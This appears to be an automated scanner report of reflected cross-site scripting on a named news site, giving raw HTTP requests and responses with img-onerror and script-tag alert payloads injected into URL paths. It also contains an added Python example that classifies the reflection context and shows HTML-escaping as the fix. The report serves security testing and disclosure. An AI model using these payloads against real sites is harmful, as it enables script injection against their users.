<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ub1fbb<img src=a onerror=alert(1)>cffacca60fa</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d0006<img%20src%3da%20onerror%3dalert(1)>2332ebb1fa was submitted in the REST URL parameter 3. This input was echoed as d0006<img src=a onerror=alert(1)>2332ebb1fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/vd0006<img%20src%3da%20onerror%3dalert(1)>2332ebb1fa HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:54 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=a78c816ee47c90ecb397e58b6c11a8aa; expires=Wed, 12-Dec-2035 00:31:55 GMT; path=/ Content-Length: 11730 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with vd0006<img src=a onerror=alert(1)>2332ebb1fa</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c40e7<img%20src%3da%20onerror%3dalert(1)>c1faae8aecc was submitted in the REST URL parameter 3. This input was echoed as c40e7<img src=a onerror=alert(1)>c1faae8aecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/wc40e7<img%20src%3da%20onerror%3dalert(1)>c1faae8aecc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:07 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=a4f52ad0ca3f2b00726f6052afc17d1e; expires=Wed, 12-Dec-2035 00:32:07 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with wc40e7<img src=a onerror=alert(1)>c1faae8aecc</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27e03<img%20src%3da%20onerror%3dalert(1)>37a8f24879b was submitted in the REST URL parameter 3. This input was echoed as 27e03<img src=a onerror=alert(1)>37a8f24879b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/x27e03<img%20src%3da%20onerror%3dalert(1)>37a8f24879b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:08 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=04f830c83d18907899ac879efb34c096; expires=Wed, 12-Dec-2035 00:32:08 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with x27e03<img src=a onerror=alert(1)>37a8f24879b</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a916<img%20src%3da%20onerror%3dalert(1)>d591c0efd was submitted in the REST URL parameter 3. This input was echoed as 9a916<img src=a onerror=alert(1)>d591c0efd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/y9a916<img%20src%3da%20onerror%3dalert(1)>d591c0efd HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=8d89e3c51dbe8238c65cae460302eef9; expires=Wed, 12-Dec-2035 00:32:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with y9a916<img src=a onerror=alert(1)>d591c0efd</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8760b<img%20src%3da%20onerror%3dalert(1)>3c1e1cd7436 was submitted in the REST URL parameter 3. This input was echoed as 8760b<img src=a onerror=alert(1)>3c1e1cd7436 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/z8760b<img%20src%3da%20onerror%3dalert(1)>3c1e1cd7436 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:32 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=fe4896c753bdf640ad8f41f812a01da4; expires=Wed, 12-Dec-2035 00:32:33 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with z8760b<img src=a onerror=alert(1)>3c1e1cd7436</h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168a7"><script>alert(1)</script>9d0872809cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/baseball168a7"><script>alert(1)</script>9d0872809cc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:18 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1018fe022a6b0d95109bc2bb240db5e2; expires=Wed, 12-Dec-2035 00:33:19 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/baseball168a7"><script>alert(1)</script>9d0872809cc%20by%20@dailyreviewer"> ...[SNIP]...
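The findings above show the same URL segment reflected in two different HTML contexts: as plain text inside an `<h1>` (the `/tags/alphabetical/` pages, where an `<img onerror>` payload opens a new tag) and inside a double-quoted `href` attribute (the `/top/` pages, where a leading `"` closes the attribute and `>` closes the tag). The Python below is an added example, not code from the report or from the site's PHP/CakePHP application. It reproduces the scanner's check: plant a canary prefix and suffix around a payload, locate them in the response, classify the surrounding HTML context by scanning only the bytes before the reflection point, and decide whether the echoed text can still break out. The page templates, the `{VALUE}` placeholder and `render_vulnerable`/`render_fixed` are constructed for illustration; the canary strings and payloads are the ones from the two findings. The fix side uses `html.escape(..., quote=True)` to stand in for whatever the real application should do before interpolation.

```python
from html import escape

# Canary markers and payloads, taken from the two findings above.
TEXT_PREFIX, TEXT_PAYLOAD, TEXT_SUFFIX = "52cd3", "<img src=a onerror=alert(1)>", "bc6908de3fc"
ATTR_PREFIX, ATTR_PAYLOAD, ATTR_SUFFIX = "168a7", '"><script>alert(1)</script>', "9d0872809cc"

# Constructed page templates reproducing the two reflection points shown in the
# report (the rest of each page is elided, as it is in the report).
TEXT_TEMPLATE = (
    '<html><body><h1 style="text-transform:capitalize">'
    'Tags Starting with {VALUE}</h1></body></html>'
)
ATTR_TEMPLATE = (
    '<html><body><a class="share-button" href="http://twitter.com/home/?status='
    'Checkin%27%20out%20http://thedailyreviewer.com/top/{VALUE}%20by%20@dailyreviewer">'
    'share</a></body></html>'
)


def render_vulnerable(template, value):
    """Interpolates the URL parameter verbatim, as the reported pages do."""
    return template.replace("{VALUE}", value)


def render_fixed(template, value):
    """HTML-encodes the value before interpolation. escape(quote=True) encodes
    < > & " and ', which neutralises both the text-context and the
    double-quoted-attribute breakouts shown in the report."""
    return template.replace("{VALUE}", escape(value, quote=True))


def html_context_at(body, offset):
    """Classify the HTML context at `offset` by scanning only the text before it,
    so the reflected payload's own < > and " characters cannot skew the result.
    Returns 'text', 'tag', 'attr_dq' or 'attr_sq'."""
    in_tag, quote = False, None
    for ch in body[:offset]:
        if quote:
            if ch == quote:
                quote = None
        elif in_tag:
            if ch in ('"', "'"):
                quote = ch
            elif ch == ">":
                in_tag = False
        elif ch == "<":
            in_tag = True
    if quote == '"':
        return "attr_dq"
    if quote == "'":
        return "attr_sq"
    return "tag" if in_tag else "text"


def check_reflection(body, prefix, payload, suffix):
    """Find prefix...suffix in the response and report what came back between
    them, which context it landed in, and whether it can still break out."""
    start = body.find(prefix)
    if start == -1:
        return None
    end = body.find(suffix, start + len(prefix))
    if end == -1:
        return None
    echoed = body[start + len(prefix):end]
    context = html_context_at(body, start)
    if context == "text":
        unsafe = "<" in echoed and ">" in echoed   # can open a new tag
    elif context == "attr_dq":
        unsafe = '"' in echoed                     # can close the attribute
    elif context == "attr_sq":
        unsafe = "'" in echoed
    else:
        unsafe = True                              # unquoted attribute: whitespace suffices
    return {"context": context, "echoed": echoed,
            "unmodified": echoed == payload, "unsafe": unsafe}


def demo():
    """Runs both reflection points vulnerable and fixed; returns the four verdicts."""
    text_value = "m" + TEXT_PREFIX + TEXT_PAYLOAD + TEXT_SUFFIX
    attr_value = "baseball" + ATTR_PREFIX + ATTR_PAYLOAD + ATTR_SUFFIX
    results = {}
    for name, template, value, pre, pay, suf in (
        ("text", TEXT_TEMPLATE, text_value, TEXT_PREFIX, TEXT_PAYLOAD, TEXT_SUFFIX),
        ("attr", ATTR_TEMPLATE, attr_value, ATTR_PREFIX, ATTR_PAYLOAD, ATTR_SUFFIX),
    ):
        results[name + "_vulnerable"] = check_reflection(render_vulnerable(template, value), pre, pay, suf)
        results[name + "_fixed"] = check_reflection(render_fixed(template, value), pre, pay, suf)
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} context={verdict['context']:8s} unsafe={verdict['unsafe']} echoed={verdict['echoed']!r}")
```

Two practical points follow from running it. First, "echoed unmodified" is not the test that matters; the test is whether the characters that close the current context survive, which is why the check is context-specific. Second, HTML entity encoding stops the breakout in both contexts, but for the `href` case it is only half the fix: the segment is being placed inside a URL, so it should be percent-encoded as a path component first and then attribute-encoded, otherwise a value containing `&` or `#` still changes the link the user is sent to.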
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3c22<img%20src%3da%20onerror%3dalert(1)>5cd3a5ef8ec was submitted in the REST URL parameter 2. This input was echoed as b3c22<img src=a onerror=alert(1)>5cd3a5ef8ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/baseballb3c22<img%20src%3da%20onerror%3dalert(1)>5cd3a5ef8ec HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:44 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=da66ff70cd3c2c6ef3ada68d898a11a7; expires=Wed, 12-Dec-2035 00:33:44 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76289
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c659f<img%20src%3da%20onerror%3dalert(1)>96f083738ae was submitted in the REST URL parameter 2. This input was echoed as c659f<img src=a onerror=alert(1)>96f083738ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/breaking-newsc659f<img%20src%3da%20onerror%3dalert(1)>96f083738ae HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:57 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=32330a38b9e1371811b57b675061cf6e; expires=Wed, 12-Dec-2035 00:32:58 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76409
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa25a"><script>alert(1)</script>c842b344918 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/breaking-newsaa25a"><script>alert(1)</script>c842b344918 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:33 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d27d4a7476e06c158e3c648f44358f7e; expires=Wed, 12-Dec-2035 00:32:34 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/breaking-newsaa25a"><script>alert(1)</script>c842b344918%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 62b36<img%20src%3da%20onerror%3dalert(1)>22ab0cec245 was submitted in the REST URL parameter 2. This input was echoed as 62b36<img src=a onerror=alert(1)>22ab0cec245 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/business62b36<img%20src%3da%20onerror%3dalert(1)>22ab0cec245 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:29 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=cbd64c986d1d23ee75618046816b1f38; expires=Wed, 12-Dec-2035 00:33:29 GMT; path=/ Content-Length: 76289 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c55"><script>alert(1)</script>b15c989737 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/businessf3c55"><script>alert(1)</script>b15c989737 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:58 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=bc04a403dd7cc1869f6a03c197ea8802; expires=Wed, 12-Dec-2035 00:32:58 GMT; path=/ Content-Length: 15295 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/businessf3c55"><script>alert(1)</script>b15c989737%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d24c5<img%20src%3da%20onerror%3dalert(1)>46cf9f731fc was submitted in the REST URL parameter 2. This input was echoed as d24c5<img src=a onerror=alert(1)>46cf9f731fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/celebritiesd24c5<img%20src%3da%20onerror%3dalert(1)>46cf9f731fc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:42 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=9cb6dc666187a6dcdc14b080edb3394e; expires=Wed, 12-Dec-2035 00:34:42 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76361
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc7d"><script>alert(1)</script>2a014fa01f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/celebrities1bc7d"><script>alert(1)</script>2a014fa01f3 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:17 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d6c11e6b0459dd45682d416c17faf7f1; expires=Wed, 12-Dec-2035 00:34:18 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/celebrities1bc7d"><script>alert(1)</script>2a014fa01f3%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ea8c<img%20src%3da%20onerror%3dalert(1)>a6c822288d7 was submitted in the REST URL parameter 2. This input was echoed as 6ea8c<img src=a onerror=alert(1)>a6c822288d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/economy6ea8c<img%20src%3da%20onerror%3dalert(1)>a6c822288d7 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=0fd36060f92bb250fc5d0a247e3033f3; expires=Wed, 12-Dec-2035 00:33:01 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76265
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cffb5"><script>alert(1)</script>a3f30ef45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/economycffb5"><script>alert(1)</script>a3f30ef45 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=3ad05db27beae48d13f2d045af0d82cd; expires=Wed, 12-Dec-2035 00:32:35 GMT; path=/
Content-Length: 15274
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/economycffb5"><script>alert(1)</script>a3f30ef45%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ee4"><script>alert(1)</script>e00f6129a7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/entertainmenta3ee4"><script>alert(1)</script>e00f6129a7e HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dd09fd26ecbda905a17168a4bd935807; expires=Wed, 12-Dec-2035 00:33:57 GMT; path=/
Content-Length: 15368
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/entertainmenta3ee4"><script>alert(1)</script>e00f6129a7e%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc22b<img%20src%3da%20onerror%3dalert(1)>1fe2183b6eb was submitted in the REST URL parameter 2. This input was echoed as cc22b<img src=a onerror=alert(1)>1fe2183b6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/entertainmentcc22b<img%20src%3da%20onerror%3dalert(1)>1fe2183b6eb HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:34:21 GMT
